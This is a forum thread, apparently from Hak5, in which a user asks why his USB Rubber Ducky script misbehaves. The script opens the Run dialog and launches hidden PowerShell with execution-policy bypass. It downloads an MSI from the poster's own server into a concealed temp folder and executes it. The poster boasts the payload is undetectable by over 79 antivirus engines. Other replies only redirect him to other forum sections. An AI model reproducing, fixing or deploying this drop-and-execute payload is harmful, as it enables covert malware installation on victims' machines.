Payload Downloader Bug

[DaviJackz]

I'm trying to make a Downloader so when I plug in the USB, it already downloads my hosted payload in some non-visible folder like %TEMP% and runs it. I've already managed to leave the FUD payload bypassing more than 79 anti virus including WD

- I'm trying with this payload below:

DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W h -Exec Bypass md "$env:userprofile\temp"; iwr "http://---------------/Sistem2.msi" -outfile "$env:userprofile\temp\Sistem2.msi"; cd $env:userprofile\temp; sleep 5; & .\System2.msi
DELAY 150
ENTER

(I censored my VPS IP)

If I manually do what the payload says, which is to open Windows + R (run menu), write the STRING command and enter, it works! Download the silent file and run as I want. But when put as payload on DuckUSB, whether encrypted or not, it starts to open several times the CTRL + ALT + DEL and the Microsoft Office program (???)

I've already tried increasing the delay of actions among other things and I don't know what else to do

[DaviJackz]

Particularly I've tried 7 different payloads to do what I want and it's quite annoying to have to keep taking out the microSD every time to make a change. If anyone can save me in this regard, it would help me a lot ❤️

[Rkiver]

There's a whole section all about the Plunder Bug.

https://forums.hak5.org/forum/97-plunder-bug/

[Irukandji]

Looks like a rubber ducky.

[dark_pyrro]

Yes, for sure Ducky-ish to me. Post the initial question in the New-Ducky part of the forum for some help and possible solutions (if the new Ducky is involved, otherwise in the classic Ducky section).